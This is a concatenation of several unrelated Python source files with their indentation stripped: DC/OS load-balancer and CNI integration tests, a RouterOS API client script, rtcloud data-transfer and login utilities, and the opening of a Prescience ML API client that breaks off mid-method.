# version of the Nginx resolver cache.
#
# We therefore wait until these conditions have certainly been met.
# We wait for the Admin Router cache refresh first so that there is
# unlikely to be much double-waiting. That is, we do not want to be waiting
# for the cache to refresh when it already refreshed while we were waiting
# for the app to become healthy.
with dcos_api_session.marathon.deploy_and_cleanup(app_definition, check_health=False):
time.sleep(adminrouter_default_refresh)
dcos_api_session.marathon.wait_for_app_deployment(
app_id=app_id,
app_instances=app_instances,
check_health=False,
ignore_failed_tasks=False,
timeout=1200,
)
r = dcos_api_session.get('/service/' + dcos_service_name + '/ping')
assert r.status_code == 200
assert 'pong' in r.json()
@retrying.retry(wait_fixed=2000,
stop_max_delay=100 * 2000,
retry_on_exception=lambda x: True)
def geturl(url):
rs = requests.get(url)
assert rs.status_code == 200
r = rs.json()
log.info('geturl {} -> {}'.format(url, r))
return r
def test_l4lb(dcos_api_session):
'''Test l4lb is load balancing between all the backends
* create 5 apps using the same VIP
* get uuid from the VIP in parallel from many threads
* verify that 5 uuids have been returned
* only testing if all 5 are hit at least once
'''
if not lb_enabled():
pytest.skip('Load Balancer disabled')
numapps = 5
numthreads = numapps * 4
apps = []
rvs = deque()
backends = []
dnsname = 'l4lbtest.marathon.l4lb.thisdcos.directory:5000'
with contextlib.ExitStack() as stack:
for _ in range(numapps):
origin_app, origin_uuid = \
test_helpers.marathon_test_app(
healthcheck_protocol=marathon.Healthcheck.MESOS_HTTP)
# same vip for all the apps
origin_app['portDefinitions'][0]['labels'] = {'VIP_0': '/l4lbtest:5000'}
apps.append(origin_app)
stack.enter_context(dcos_api_session.marathon.deploy_and_cleanup(origin_app))
sp = dcos_api_session.marathon.get_app_service_endpoints(origin_app['id'])
backends.append({'port': sp[0].port, 'ip': sp[0].host})
# make sure that the service point responds
geturl('http://{}:{}/ping'.format(sp[0].host, sp[0].port))
# make sure that the VIP is responding too
geturl('http://{}/ping'.format(dnsname))
vips = geturl("http://localhost:62080/v1/vips")
[vip] = [vip for vip in vips if vip['vip'] == dnsname and vip['protocol'] == 'tcp']
for backend in vip['backend']:
backends.remove(backend)
assert backends == []
# do many requests in parallel.
def thread_request():
# deque is thread safe
rvs.append(geturl('http://l4lbtest.marathon.l4lb.thisdcos.directory:5000/test_uuid'))
threads = [threading.Thread(target=thread_request) for i in range(0, numthreads)]
for t in threads:
t.start()
for t in threads:
t.join()
expected_uuids = [a['id'].split('-')[2] for a in apps]
received_uuids = [r['test_uuid'] for r in rvs if r is not None]
assert len(set(expected_uuids)) == numapps
assert len(set(received_uuids)) == numapps
assert set(expected_uuids) == set(received_uuids)
def test_dcos_cni_l4lb(dcos_api_session):
'''
    This tests the `dcos-l4lb` CNI plugin:
    https://github.com/dcos/dcos-cni/tree/master/cmd/l4lb
    The `dcos-l4lb` CNI plugin allows containers running on networks that don't
necessarily have routes to spartan interfaces and minuteman VIPs to consume DNS
service from spartan and layer-4 load-balancing services from minuteman by
injecting spartan and minuteman services into the container's network
namespace. You can read more about the motivation for this CNI plugin and type
of problems it solves in this design doc:
https://docs.google.com/document/d/1xxvkFknC56hF-EcDmZ9tzKsGiZdGKBUPfrPKYs85j1k/edit?usp=sharing
In order to test `dcos-l4lb` CNI plugin we emulate a virtual network that
lacks routes for spartan interface and minuteman VIPs. In this test, we
first install a virtual network called `spartan-net` on one of the agents.
The `spartan-net` is a CNI network that is a simple BRIDGE network with the
caveat that it doesn't have any default routes. `spartan-net` has routes
only for the agent network. In other words it doesn't have any routes
towards the spartan-interfaces or minuteman VIPs.
We then run a server (our python ping-pong server) on the DC/OS overlay.
    Finally, to test that the `dcos-l4lb` plugin, which is also part of
    `spartan-net`, is able to inject the Minuteman and Spartan services into the
    container's netns, we start a client on `spartan-net` and try to `curl` the
`ping-pong` server using its VIP. Without the Minuteman and Spartan services
injected in the container's netns the expectation would be that this `curl`
would fail, with a successful `curl` execution on the VIP allowing the
test-case to PASS.
'''
if not lb_enabled():
pytest.skip('Load Balancer disabled')
expanded_config = test_helpers.get_expanded_config()
if expanded_config.get('security') == 'strict':
pytest.skip('Cannot setup CNI config with EE strict mode enabled')
# Run all the test application on the first agent node
host = dcos_api_session.slaves[0]
# CNI configuration of `spartan-net`.
spartan_net = {
'cniVersion': '0.2.0',
'name': 'spartan-net',
'type': 'dcos-l4lb',
'delegate': {
'type': 'mesos-cni-port-mapper',
'excludeDevices': ['sprt-cni0'],
'chain': 'spartan-net',
'delegate': {
'type': 'bridge',
'bridge': 'sprt-cni0',
'ipMasq': True,
'isGateway': True,
'ipam': {
'type': 'host-local',
'subnet': '192.168.250.0/24',
'routes': [
# Reachability to DC/OS overlay.
{'dst': '9.0.0.0/8'},
# Reachability to all private address subnet. We need
# this reachability since different cloud providers use
# different private address spaces to launch tenant
# networks.
{'dst': '10.0.0.0/8'},
{'dst': '172.16.0.0/12'},
{'dst': '192.168.0.0/16'}
]
}
}
}
}
log.info("spartan-net config:{}".format(json.dumps(spartan_net)))
# Application to deploy CNI configuration.
cni_config_app = MarathonApp(
marathon.Container.NONE, marathon.Network.HOST, host,
app_name_fmt='/integration-test/cni-l4lb/config-{}')
# Override the default test app command with a command to write the CNI
# configuration.
#
# NOTE: We add the original command at the end of this command so that the task
# stays alive for the test harness to make sure that the task got deployed.
# Ideally we should be able to deploy one of tasks using the test harness
# but that doesn't seem to be the case here.
cni_config_app.app['cmd'] = \
"echo '{}' > {} && {}".format(
json.dumps(spartan_net),
'/opt/mesosphere/etc/dcos/network/cni/spartan.cni',
cni_config_app.app['cmd'])
log.info("CNI Config application: {}".format(cni_config_app.app))
try:
cni_config_app.deploy(dcos_api_session)
cni_config_app.wait(dcos_api_session)
finally:
cni_config_app.purge(dcos_api_session)
log.info("CNI Config has been deployed on {}".format(host))
# Get the host on which the `spartan-net` was installed.
# Launch the test-app on DC/OS overlay, with a VIP.
server_vip_label = '/spartanvip:10000'
server_vip_addr = 'spartanvip.marathon.l4lb.thisdcos.directory:10000'
# Launch the test_server in ip-per-container mode (user network)
server_app = MarathonApp(
marathon.Container.MESOS, marathon.Network.USER, host,
vip=server_vip_label, app_name_fmt='/integration-test/cni-l4lb/server-{}')
log.info("Server application: {}".format(server_app.app))
# Get the client app on the 'spartan-net' network.
client_app = MarathonApp(
marathon.Container.MESOS, marathon.Network.USER, host,
network_name='spartan-net', app_name_fmt='/integration-test/cni-l4lb/client-{}')
log.info("Client application: {}".format(client_app.app))
try:
# Launch the test application
client_app.deploy(dcos_api_session)
server_app.deploy(dcos_api_session)
# Wait for the test application
server_app.wait(dcos_api_session)
client_app.wait(dcos_api_session)
client_host, client_port = client_app.hostport(dcos_api_session)
# Check linux kernel version
uname = ensure_routable('uname -r', client_host, client_port, json_output=False)
if '3.10.0-862' <= uname < '3.10.0-898':
return pytest.skip('See https://bugzilla.redhat.com/show_bug.cgi?id=1572983')
# Change the client command task to do a curl on the server we just deployed.
cmd = '/opt/mesosphere/bin/curl -s -f -m 5 http://{}/test_uuid'.format(server_vip_addr)
assert ensure_routable(cmd, client_host, client_port)['test_uuid'] == server_app.uuid
finally:
server_app.purge(dcos_api_session)
client_app.purge(dcos_api_session)
def enum2str(value):
return str(value).split('.')[-1].lower()
def net2str(value, ipv6):
return enum2str(value) if not ipv6 else 'ipv6'
@retrying.retry(wait_fixed=2000,
stop_max_delay=100 * 2000,
retry_on_exception=lambda x: True)
def test_dcos_net_cluster_identity(dcos_api_session):
cluster_id = 'minuteman' # default
expanded_config = test_helpers.get_expanded_config()
if expanded_config['dcos_net_cluster_identity'] == 'true':
with open('/var/lib/dcos/cluster-id') as f:
cluster_id = "'{}'".format(f.readline().rstrip())
argv = ['sudo', '/opt/mesosphere/bin/dcos-net-env', 'eval', 'erlang:get_cookie().']
cookie = subprocess.check_output(argv, stderr=subprocess.STDOUT).decode('utf-8').rstrip()
assert cluster_id == cookie, "cluster_id: {}, cookie: {}".format(cluster_id, cookie)
|
scriptHotSpot.py
|
#!/usr/bin/python3
import sys, posix, time, binascii, socket, select, multiprocessing
import hashlib, time
class ApiRos:
"Routeros api"
def __init__(self, sk):
self.sk = sk
self.currenttag = 0
def login(self, username, pwd):
for repl, attrs in self.talk(["/login"]):
chal = binascii.unhexlify((attrs['=ret']).encode('UTF-8'))
md = hashlib.md5()
md.update(b'\x00')
md.update(pwd.encode('UTF-8'))
md.update(chal)
self.talk(["/login", "=name=" + username,
"=response=00" + binascii.hexlify(md.digest()).decode('UTF-8') ])
def talk(self, words):
if self.writeSentence(words) == 0: return
r = []
while 1:
            i = self.readSentence()
if len(i) == 0: continue
reply = i[0]
attrs = {}
for w in i[1:]:
j = w.find('=', 1)
if (j == -1):
attrs[w] = ''
else:
attrs[w[:j]] = w[j+1:]
r.append((reply, attrs))
if reply == '!done': return r
def writeSentence(self, words):
ret = 0
for w in words:
self.writeWord(w)
ret += 1
self.writeWord('')
return ret
def readSentence(self):
r = []
while 1:
w = self.readWord()
if w == '': return r
r.append(w)
def writeWord(self, w):
print(("<<< " + w))
self.writeLen(len(w))
self.writeStr(w)
def readWord(self):
ret = self.readStr(self.readLen())
print((">>> " + ret))
return ret
def writeLen(self, l):
if l < 0x80:
self.writeStr(chr(l))
elif l < 0x4000:
l |= 0x8000
self.writeStr(chr((l >> 8) & 0xFF))
self.writeStr(chr(l & 0xFF))
elif l < 0x200000:
l |= 0xC00000
self.writeStr(chr((l >> 16) & 0xFF))
self.writeStr(chr((l >> 8) & 0xFF))
self.writeStr(chr(l & 0xFF))
elif l < 0x10000000:
l |= 0xE0000000
self.writeStr(chr((l >> 24) & 0xFF))
self.writeStr(chr((l >> 16) & 0xFF))
self.writeStr(chr((l >> 8) & 0xFF))
self.writeStr(chr(l & 0xFF))
else:
self.writeStr(chr(0xF0))
self.writeStr(chr((l >> 24) & 0xFF))
self.writeStr(chr((l >> 16) & 0xFF))
self.writeStr(chr((l >> 8) & 0xFF))
self.writeStr(chr(l & 0xFF))
def readLen(self):
c = ord(self.readStr(1))
if (c & 0x80) == 0x00:
pass
elif (c & 0xC0) == 0x80:
c &= ~0xC0
c <<= 8
c += ord(self.readStr(1))
elif (c & 0xE0) == 0xC0:
c &= ~0xE0
c <<= 8
c += ord(self.readStr(1))
c <<= 8
c += ord(self.readStr(1))
elif (c & 0xF0) == 0xE0:
c &= ~0xF0
c <<= 8
c += ord(self.readStr(1))
c <<= 8
c += ord(self.readStr(1))
c <<= 8
c += ord(self.readStr(1))
elif (c & 0xF8) == 0xF0:
c = ord(self.readStr(1))
c <<= 8
c += ord(self.readStr(1))
c <<= 8
c += ord(self.readStr(1))
c <<= 8
c += ord(self.readStr(1))
return c
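    # Note on the framing above: the RouterOS API length prefix is variable width.
    # The number of leading 1-bits in the first byte says how many bytes encode the
    # word length: 0xxxxxxx = 1 byte (< 0x80), 10xxxxxx = 2 bytes (< 0x4000),
    # 110xxxxx = 3 bytes (< 0x200000), 1110xxxx = 4 bytes (< 0x10000000),
    # and a leading 0xF0 byte introduces a full 4-byte length.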
def writeStr(self, str):
        n = 0
while n < len(str):
r = self.sk.send(bytes(str[n:], 'UTF-8'))
if r == 0: raise RuntimeError("connection closed by remote end")
n += r
def readStr(self, length):
ret = ''
while len(ret) < length:
s = self.sk.recv(length - len(ret))
            if not s: raise RuntimeError("connection closed by remote end")
ret += s.decode('UTF-8', 'replace')
return ret
def main():
s = None
for res in socket.getaddrinfo(sys.argv[1], "8728", socket.AF_UNSPEC, socket.SOCK_STREAM):
af, socktype, proto, canonname, sa = res
try:
s = socket.socket(af, socktype, proto)
        except socket.error:
s = None
continue
try:
s.connect(sa)
        except socket.error:
s.close()
s = None
continue
break
if s is None:
print ('could not open socket')
sys.exit(1)
    apiros = ApiRos(s)
    apiros.login('admin', 'PASSWORD')
inputsentence = ['/interface/wireless/registration-table/print']
apiros.writeSentence(inputsentence)
t_end = time.time() + 2.5
while time.time() < t_end:
r = select.select([s], [], [], None)
if s in r[0]:
# something to read in socket, read sentence
x = apiros.readSentence()
sys.exit()
if __name__ == '__main__':
p=multiprocessing.Process(target=main, name="Main")
p.start()
p.join(2)
if p.is_alive():
print("Killing...")
p.terminate()
p.join()
|
projectUtils.py
|
"""
This module contains utility functions used internally by the rtcloud services
"""
import os
import sys
import re
import time
import zlib
import hashlib
import logging
import getpass
import requests
import threading
from pathlib import Path
from base64 import b64encode, b64decode
import rtCommon.utils as utils
from rtCommon.structDict import StructDict
from rtCommon.imageHandling import readDicomFromBuffer
from rtCommon.errors import RequestError, StateError, ValidationError
from requests.packages.urllib3.contrib import pyopenssl
certFile = 'certs/rtcloud.crt'
# Cache of multi-part data transfers in progress
multiPartDataCache = {}
dataPartSize = 10 * (2**20)
def watchForExit():
'''
Create a thread which will detect if the parent process exited by
reading from stdin, when stdin is closed exit this process.
'''
exitThread = threading.Thread(name='exitThread', target=processShouldExitThread)
exitThread.setDaemon(True)
exitThread.start()
def processShouldExitThread():
'''
If this client was spawned by a parent process, then by listening on
stdin we can tell that the parent process exited when stdin is closed. When
stdin is closed we can exit this process as well.
'''
# print('processShouldExitThread: starting', flush=True)
while True:
# logging.info('process should exit loop')
data = sys.stdin.read()
if len(data) == 0:
print('processShouldExitThread: stdin closed, exiting', flush=True)
os._exit(0) # - this kills everything immediately
break
time.sleep(0.5)
def generateDataParts(data, msg, compress):
"""
A python "generator" that, for data > 10 MB, will create multi-part
messages of 10MB each to send the data incrementally
Args:
data (bytes): data to send
msg (dict): message header for the request
compress (bool): whether to compress the data befor sending
Returns:
Repeated calls return the next partial message to be sent until
None is returned
"""
dataSize = len(data)
# update message for all data parts with the following info
numParts = (dataSize + dataPartSize - 1) // dataPartSize
msg['status'] = 200
msg['fileSize'] = dataSize
msg['fileHash'] = hashlib.md5(data).hexdigest()
msg['numParts'] = numParts
if numParts > 1:
msg['multipart'] = True
i = 0
partId = 0
dataSize = len(data)
while i < dataSize:
msgPart = msg.copy()
partId += 1
sendSize = dataSize - i
if sendSize > dataPartSize:
sendSize = dataPartSize
dataPart = data[i:i+sendSize]
msgPart['partId'] = partId
try:
msgPart = encodeMessageData(msgPart, dataPart, compress)
except Exception as err:
msgPart['status'] = 400
msgPart['error'] = str(err)
yield msgPart
break
yield msgPart
i += sendSize
return
def encodeMessageData(message, data, compress):
"""
b64 encode binary data in preparation for sending. Updates the message header
as needed
Args:
message (dict): message header
data (bytes): binary data
compress (bool): whether to compress binary data
Returns:
Modified message dict with appropriate fields filled in
"""
message['hash'] = hashlib.md5(data).hexdigest()
dataSize = len(data)
if compress or dataSize > (20*2**20):
message['compressed'] = True
data = zlib.compress(data)
message['data'] = b64encode(data).decode('utf-8')
message['dataSize'] = dataSize
# if 'compressed' in message:
# print('Compression ratio: {:.2f}'.format(len(message['data'])/dataSize))
if len(message['data']) > 100*1024*1024:
message['data'] = None
raise ValidationError('encodeMessageData: encoded file exceeds max size of 100MB')
return message
def decodeMessageData(message):
"""
Given a message encoded with encodeMessageData (above), decode that message.
Validate and retrive orignal bytes.
Args:
message (dict): encoded message to decode
Returns:
The byte data of the original message from the sender
"""
data = None
if 'data' not in message:
raise RequestError('decodeMessageData: data field not in response')
decodedData = b64decode(message['data'])
if 'compressed' in message:
data = zlib.decompress(decodedData)
else:
data = decodedData
if 'hash' in message:
dataHash = hashlib.md5(data).hexdigest()
if dataHash != message['hash']:
raise RequestError('decodeMessageData: Hash checksum mismatch {} {}'.
format(dataHash, message['hash']))
return data
def unpackDataMessage(msg):
"""
Handles receiving multipart (an singlepart) data messages and returns the data bytes.
In the case of multipart messages a data cache is used to store intermediate parts
until all parts are received and the final data can be reconstructed.
Args:
msg (dict): Potentially on part of a multipart message to unpack
Returns:
None if not all multipart messages have been received yet, or
Data bytes if all multipart messages have been received.
"""
global multiPartDataCache
try:
if msg.get('status') != 200:
# On error delete any partial transfers
fileHash = msg.get('fileHash')
if fileHash is not None and fileHash in multiPartDataCache:
del multiPartDataCache[fileHash]
raise RequestError('unpackDataMessage: {} {}'.format(msg.get('status'), msg.get('error')))
data = decodeMessageData(msg)
multipart = msg.get('multipart', False)
numParts = msg.get('numParts', 1)
partId = msg.get('partId', 1)
logging.debug('unpackDataMessage: callid {}, part {} of {}'.format(msg.get('callId'), partId, numParts))
if multipart is False or numParts == 1:
# All data sent in a single message
return data
else:
assert numParts > 1
assert multipart is True
if partId > numParts:
raise RequestError(
'unpackDataMessage: Inconsistent parts: partId {} exceeds numParts {}'.
format(partId, numParts))
# get the data structure for this data
fileHash = msg.get('fileHash')
if partId > 1:
partialDataStruct = multiPartDataCache.get(fileHash)
if partialDataStruct is None:
raise RequestError('unpackDataMessage: partialDataStruct not found')
else:
partialDataStruct = StructDict({'cachedDataParts': [None]*numParts, 'numCachedParts': 0})
multiPartDataCache[fileHash] = partialDataStruct
partialDataStruct.cachedDataParts[partId-1] = data
partialDataStruct.numCachedParts += 1
if partialDataStruct.numCachedParts == numParts:
# All parts of the multipart transfer have been received
# Concatenate the data into one bytearray
data = bytearray()
for i in range(numParts):
dataPart = partialDataStruct.cachedDataParts[i]
if dataPart is None:
raise StateError('unpackDataMessage: missing dataPart {}'.format(i))
data.extend(dataPart)
# Check fileHash and fileSize
dataHash = hashlib.md5(data).hexdigest()
dataSize = len(data)
if dataHash != fileHash:
raise RequestError("unpackDataMessage: File checksum mismatch {} {}".
format(dataHash, fileHash))
if dataSize != msg.get('fileSize', 0):
raise RequestError("unpackDataMessage: File size mismatch {} {}".
format(dataSize, msg.get('fileSize', 0)))
# delete the multipart data cache for this item
del multiPartDataCache[fileHash]
return data
# Multi-part transfer not complete, nothing to return
return None
except Exception as err:
# removed any cached data
fileHash = msg.get('fileHash')
if fileHash and fileHash in multiPartDataCache:
del multiPartDataCache[fileHash]
raise err
def formatFileData(filename, data):
"""
Convert raw bytes to a specific memory format such as dicom or matlab data
"""
fileExtension = Path(filename).suffix
if fileExtension == '.mat':
# Matlab file format
result = utils.loadMatFileFromBuffer(data)
elif fileExtension == '.dcm':
# Dicom file format
result = readDicomFromBuffer(data)
else:
result = data
return result
def login(serverAddr, username, password, testMode=False):
"""
Logs in to a web service, prompting user for username/password as needed,
and returns a session_cookie to allow future requests without logging in.
"""
loginURL = os.path.join('https://', serverAddr, 'login')
if testMode:
loginURL = os.path.join('http://', serverAddr, 'login')
username = 'test'
password = 'test'
session = requests.Session()
session.verify = certFile
try:
getResp = session.get(loginURL, timeout=10)
except Exception:
raise ConnectionError('Connection error: {}'.format(loginURL))
if getResp.status_code != 200:
raise requests.HTTPError('Get URL: {}, returned {}'.format(loginURL, getResp.status_code))
if username is None:
print('Login required...')
username = input('Username: ')
password = getpass.getpass()
elif password is None:
password = getpass.getpass()
postData = {'name': username, 'password': password, '_xsrf': session.cookies['_xsrf']}
postResp = session.post(loginURL, postData)
if postResp.status_code != 200:
raise requests.HTTPError('Post URL: {}, returned {}'.format(loginURL, postResp.status_code))
login_cookie = session.cookies.get('login')
return login_cookie
def checkSSLCertAltName(certFilename, altName):
"""
Check if altName is list as an alternate server name in the ssl certificate
"""
with open(certFilename, 'r') as fh:
certData = fh.read()
x509 = pyopenssl.OpenSSL.crypto.load_certificate(pyopenssl.OpenSSL.crypto.FILETYPE_PEM, certData)
altNames = pyopenssl.get_subj_alt_name(x509)
for _, name in altNames:
if altName == name:
return True
return False
def makeSSLCertFile(serverName):
logging.info('create sslCert')
cmd = 'bash scripts/make-sslcert.sh '
if re.match('^[0-9*]+\.', serverName):
cmd += ' -ip ' + serverName
else:
cmd += ' -url ' + serverName
success = utils.runCmdCheckOutput(cmd.split(), 'certified until')
if not success:
print('Failed to make certificate:')
sys.exit()
|
prescience_client.py
|
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file.
# Copyright 2019 The Prescience-Client Authors. All rights reserved.
import json
import os
from multiprocessing import Process, Queue
import pycurl
import re
import shutil
import time
import urllib.parse
import io
from io import BytesIO
from datetime import datetime
import matplotlib
import numpy
import pandas
from prescience_client.enum.separator import Separator
from progress.bar import ChargingBar, IncrementalBar
from websocket import create_connection, WebSocketException
from hashids import Hashids
from prescience_client.bean.config import Config
from prescience_client.bean.entity.w10_ts_input import Warp10TimeSerieInput, Warp10Scheduler
from prescience_client.bean.project import Project
from prescience_client.config.constants import DEFAULT_LABEL_NAME, DEFAULT_PROBLEM_TYPE
from prescience_client.config.prescience_config import PrescienceConfig
from prescience_client.enum.algorithm_configuration_category import AlgorithmConfigurationCategory
from prescience_client.enum.flow_type import FlowType
from prescience_client.enum.fold_strategy import FoldStrategy
from prescience_client.enum.input_type import InputType
from prescience_client.enum.problem_type import ProblemType
from prescience_client.enum.scoring_metric import ScoringMetric
from prescience_client.enum.sort_direction import SortDirection
from prescience_client.enum.status import Status
from prescience_client.enum.web_service import PrescienceWebService
from prescience_client.exception.prescience_client_exception import PyCurlExceptionFactory, \
HttpErrorExceptionFactory, PrescienceClientException, PrescienceException
from prescience_client.utils import dataframe_to_dict_series
from prescience_client.utils.monad import Option
class PrescienceClient(object):
"""
Prescience HTTP client allowing us to interact directly with prescience api.
Prescience API is describe here https://prescience-api.ai.ovh.net/
"""
def __init__(self,
prescience_config: PrescienceConfig):
self.prescience_config = prescience_config
self.hashids = Hashids()
def _get_unique_id(self):
return self.hashids.encrypt(int(time.time()))
def login(self):
"""
Method used for login into prescience
:return: The cookie token used to connect to the web-socket
"""
_, _, cookie = self.__get(path='/session/login')
return cookie['token']
def config(self) -> PrescienceConfig:
"""
Getter of the prescience configuration object
:return: The prescience configuration object
"""
return self.prescience_config
def new_project_token(self) -> dict:
"""
ADMIN ONLY METHOD
This method needs admin right to be authorized on prescience server
It allow you to create a new prescience project and give you back the bearer token for this project
:return:
"""
current_config = self.config()
_, result, _ = self.__post(
path='/project',
call_type=PrescienceWebService.ADMIN_API,
data={'name': current_config.get_current_project_name()}
)
return result
def upload_source(self,
source_id: str,
input_type: InputType,
headers: bool,
separator: Separator,
filepath: str
) -> 'Task':
"""
Upload a local input file on prescience and launch a Parse Task on it for creating a source.
:param source_id: The id that we want for the source
:param input_type: The input type of the given local input file
:param separator: The CSV Separator
:param headers: Has the local input file headers ?
:param filepath: The path of the local input file/directory
:return: The task object of the Parse Task
"""
parse_input = {
'source_id': source_id,
'type': str(input_type),
'headers': headers,
'separator': str(separator)
}
print("Uploading source with following arguments :")
print(json.dumps(parse_input, indent=4))
if os.path.isdir(filepath):
multipart = [
(
'input-file',
(pycurl.FORM_FILE, os.path.join(filepath, filename))
) for filename in os.listdir(filepath)
]
else:
multipart = [
('input-file', (pycurl.FORM_FILE, filepath))
]
multipart = [
('input',
(pycurl.FORM_CONTENTS, json.dumps(parse_input), pycurl.FORM_CONTENTTYPE, 'application/json'))
] + multipart
_, result, _ = self.__post(path='/ml/upload/source', multipart=multipart)
from prescience_client.bean.task import TaskFactory
return TaskFactory.construct(result, self)
def parse_w10_time_serie(self, w10_ts_input: Warp10TimeSerieInput) -> 'Task':
"""
Launch a parse task on a w10 time series
:param w10_ts_input: Input Payload containing all w10 TS information
:return: The created parse task
"""
_, result, _ = self.__post(path='/ml/parse/ts', data=w10_ts_input.to_dict())
from prescience_client.bean.task import TaskFactory
return TaskFactory.construct(result, self)
def update_source(self, source_id: str, last_point_date: datetime = None, sample_span: str = None):
"""
Refresh Warp10 source
:param source_id: The source_id
last_point_timestamp: The date of the last point to be considered in updating the time serie source. (in us) If not provided it is inferred to now.
sample_span: The size of the sample to be used in updating the time serie source. If not provided it is inferred to the existing sample span.
"""
body = {}
if last_point_date:
body['last_point_timestamp'] = int(last_point_date.timestamp() * 1e6)
if sample_span:
body['sample_span'] = sample_span
_, result, _ = self.__post(path=f'/ml/update/{source_id}', data=body)
from prescience_client.bean.task import TaskFactory
return TaskFactory.construct(result, self)
def delete_source(self, source_id: str):
"""
Delete a source from its ID
:param source_id: The source ID
"""
self.__delete(path=f'/source/{source_id}')
def delete_dataset(self, dataset_id: str):
"""
Delete a dataset from its ID
:param dataset_id: The dataset ID
"""
self.__delete(path=f'/dataset/{dataset_id}')
def delete_model(self, model_id: str):
"""
Delete a model from its ID
:param model_id: The model ID
"""
self.__delete(path=f'/model/{model_id}')
def preprocess(
self,
source_id: str,
dataset_id: str,
label_id: str = DEFAULT_LABEL_NAME,
problem_type: ProblemType = DEFAULT_PROBLEM_TYPE,
log_enabled: bool = False,
selected_column: list = None,
time_column: str = None,
nb_fold: int = None,
fold_size: int = None,
fold_strategy: FoldStrategy = None,
test_ratio: float = None,
formatter: str = None,
datetime_exogenous: list = None,
granularity: str = None
):
"""
Launch a Preprocess Task from a Source for creating a Dataset
:param source_id: The initial Source ID
:param dataset_id: The id that we want for the Dataset
:param label_id: The name of the Source column that we want to predict (the label)
:param problem_type: The type of machine learning problem that we want to solve
:param log_enabled: Preprocess numeric variable with log10
:param selected_column: subset of the source column to use for preprocessing, by default it will use all
:param time_column: Indicates the time column (or step column) for a time-series problem type
:param nb_fold: The number of fold to create during the preprocessing of the source
:param fold_size: The number of fold to use on cross-validation
:param fold_strategy: For time series the way to split data in different fold
:param test_ratio: The size of test ratio
:param formatter: (For TS only) The string formatter that prescience should use for parsing date column (ex: yyyy-MM-dd)
:param datetime_exogenous: (For TS only) The augmented features related to date to computing during preprocessing
:param granularity: (For TS only) The granularity to use for the date
:return: The task object of the Preprocess Task
"""
body = {
'dataset_id': dataset_id,
'label_id': label_id,
'problem_type': str(problem_type),
'log_enabled': log_enabled
}
if selected_column is not None:
body['selected_columns'] = selected_column
if time_column is not None:
body['time_column_id'] = time_column
if fold_size is not None and fold_size >= 0:
body['fold_size'] = fold_size
if fold_strategy is not None:
body['fold_strategy'] = str(fold_strategy)
if nb_fold is not None and nb_fold >= 0:
body['nb_fold'] = nb_fold
if test_ratio is not None and test_ratio > 0:
body['test_ratio'] = test_ratio
date_time_info = {}
if formatter is not None:
date_time_info['format'] = formatter
if datetime_exogenous is not None:
date_time_info['exogenous'] = datetime_exogenous
if granularity is not None:
date_time_info['granularity'] = granularity
if len(date_time_info) != 0:
body['datetime_info'] = date_time_info
_, result, _ = self.__post(path=f'/ml/preprocess/{source_id}', data=body)
from prescience_client.bean.task import TaskFactory
return TaskFactory.construct(result, self)
def optimize(self,
dataset_id: str,
scoring_metric: ScoringMetric,
budget: int = None,
optimization_method: str = None,
custom_parameter: dict = None,
forecasting_horizon_steps: int = None,
forecast_discount: float = None
) -> 'Task':
"""
Launch an optimize task from a dataset object
:param dataset_id: The Id of the initial dataset
:param scoring_metric: The scoring metric that we want to optimize on
:param budget: The budget to consume before stopping the optimization
:param forecasting_horizon_steps: Number of steps forward to take into account as a forecast horizon for the optimization
:return: The task object of the Optimize Task
"""
optimize_input = {
'scoring_metric': str(scoring_metric),
'budget': budget,
'optimization_method': optimization_method,
'custom_parameters': custom_parameter,
'forecasting_horizon_steps': forecasting_horizon_steps,
'forecasting_discount': forecast_discount
}
data = {k: v for k, v in optimize_input.items() if v is not None} # Delete None value in dict
_, result, _ = self.__post(
path=f'/ml/optimize/{dataset_id}',
data=data
)
from prescience_client.bean.task import TaskFactory
return TaskFactory.construct(result, self)
def custom_config(self,
dataset_id: str,
config: Config
) -> 'Task':
"""
Launch the evaluation of a single custom configuration from a dataset
:param dataset_id: The initial dataset ID
:param config: The custom configuration that we want to evaluate
:return: The evaluation task
"""
_, result, _ = self.__post(path=f'/ml/custom-config/{dataset_id}', data=config.json_dict)
from prescience_client.bean.task import TaskFactory
return TaskFactory.construct(result, self)
def train(self,
evaluation_uuid: str,
model_id: str,
compute_shap_summary: bool = False,
chain_metric_task: bool = True,
dataset_id: str = None
) -> 'TrainTask':
"""
Launch a train task from an evaluation result for creating a model
:param evaluation_uuid: The initial evaluation result uuid
:param model_id: The id that we want for the model
:param compute_shap_summary: should chain the train task with a compute shap summary task ? (default: false)
:param chain_metric_task: should chain the train task with a metric task ? (default: true)
:param dataset_id: dataset to use for the train (default: None, dataset parent of the evaluation)
:return: The Train Task object
"""
query_parameters = {
'model_id': model_id,
'evaluation_uuid': evaluation_uuid,
'enable_shap_summary': compute_shap_summary,
'chain_metric_task': chain_metric_task,
'dataset_id': dataset_id
}
_, result, _ = self.__post(path=f'/ml/train', query_parameters=query_parameters)
from prescience_client.bean.task import TaskFactory
return TaskFactory.construct(result, self)
def retrain(self,
model_id: str,
filepath: str = None,
chain_metric_task: bool = True,
enable_shap_summary: bool = None,
last_point_date: datetime = None,
sample_span: str = None
) -> 'TrainTask':
"""
Launch a Re-Train task on a model
:param model_id: The initial model ID
:param filepath: The path of the local input file/directory
:param chain_metric_task: should chain the train task with a metric task ? (default: True)
:return:
"""
query_parameters = {
'chain_metric_task': chain_metric_task,
'enable_shap_summary': enable_shap_summary
}
if last_point_date:
query_parameters['last_point_timestamp'] = int(last_point_date.timestamp() * 1e6)
if sample_span:
query_parameters['sample_span'] = sample_span
if filepath:
if os.path.isdir(filepath):
multipart = [
(
'input-file',
(pycurl.FORM_FILE, os.path.join(filepath, filename))
) for filename in os.listdir(filepath)
]
else:
multipart = [
('input-file', (pycurl.FORM_FILE, filepath))
]
else:
multipart = None
_, result, _ = self.__post(path=f'/ml/retrain/{model_id}', query_parameters=query_parameters,
multipart=multipart)
from prescience_client.bean.task import TaskFactory
return TaskFactory.construct(result, self)
def interrupt(self,
task_id: str):
"""
Interrupt a task on prescience
:param task_id: The task ID to interrupt
"""
_, _, _ = self.__post(path=f'/task/{task_id}/interrupt')
def create_mask(self,
dataset_id: str,
mask_id: str,
selected_column: list) -> 'Dataset':
"""
Create a Mask Dataset from a Dataset
:param dataset_id: The initial Dataset ID
:param mask_id: The new ID that we want to create for the Mask Dataset
:param selected_column: The subset of the initial Dataset that we want to keep for the Mask Dataset
:return: The new Mask Dataset
"""
query_parameters = {'mask_id': mask_id}
_, result, _ = self.__post(path=f'/dataset/mask/{dataset_id}', data=selected_column,
